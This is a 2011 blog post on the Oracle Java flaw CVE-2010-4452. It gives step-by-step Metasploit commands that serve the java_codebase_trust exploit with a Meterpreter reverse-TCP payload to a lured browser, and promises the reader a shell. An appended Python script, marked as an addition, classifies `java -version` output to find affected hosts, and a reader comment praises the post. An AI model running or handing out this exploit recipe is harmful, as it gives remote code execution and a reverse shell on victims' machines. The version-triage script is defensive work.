Saturday, 30 April 2011

JAVA CVE-2010-4452




CVE:  CVE-2010-4452
Remote:  Yes
Local:  No
Published:  Feb 15 2011 12:00AM
Updated:  Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in the Java Runtime Environment. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. This vulnerability affects the following supported versions: 6 Update 23 and lower.
To exploit it, you can use the following syntax in Metasploit:
use windows/browser/java_codebase_trust
set SRVHOST 192.168.1.69
set SRVPORT 80
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.69
set LPORT 8888
exploit
Then open up the client browser and open the URL http://192.168.1.69/
You should get your shell!
I tested on Windows XP and Windows 7; both worked fine, but it didn't work on Ubuntu.
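
To find hosts that still fall in the affected range given in the description (Java 6 Update 23 and lower), the following added example, which is not part of the original post, classifies collected `java -version` output. The hostnames and version strings in the sample inventory are constructed for illustration, and versions other than Java 6 are reported as "not-covered" because the post does not list them.

```python
import re

# Affected range as stated in the post: Java 6 Update 23 and lower.
AFFECTED_MAJOR = 6
LAST_AFFECTED_UPDATE = 23

# Matches legacy version strings such as "1.6.0_23", "1.6.0_23-b05" or "1.6.0".
_VERSION_RE = re.compile(r'\b1\.(\d+)\.0(?:_(\d+))?')


def parse_java_version(text):
    """Return (major, update) from `java -version` output, or None if absent."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    # A missing "_NN" suffix means the initial release, i.e. update 0.
    return int(m.group(1)), int(m.group(2) or 0)


def classify(text):
    """Classify one host's JRE against the affected range given in the post."""
    parsed = parse_java_version(text)
    if parsed is None:
        return "unknown"
    major, update = parsed
    if major != AFFECTED_MAJOR:
        return "not-covered"  # the post only lists Java 6
    return "affected" if update <= LAST_AFFECTED_UPDATE else "patched"


def triage(inventory):
    """Map hostname -> classification for a dict of hostname -> version text."""
    return {host: classify(text) for host, text in inventory.items()}


# Constructed sample inventory (hostnames and strings are made up).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_23"\nJava(TM) SE Runtime Environment (build 1.6.0_23-b05)',
    "ws-02": 'java version "1.6.0_24"',
    "ws-03": 'java version "1.6.0"',
    "ws-04": 'java version "1.7.0_05"',
    "ws-05": "java: command not found",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host}: {status}")
```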

1 comment:

  1. Hi...
    I am Gaurav Garg from How To Hack A Computer.
    I like your web site or all available content but I like this post the most.
    Thanks for providing this information in this open way.

    Regards
    Gaurav Garg

    Keep Posting
    Have A Nice day
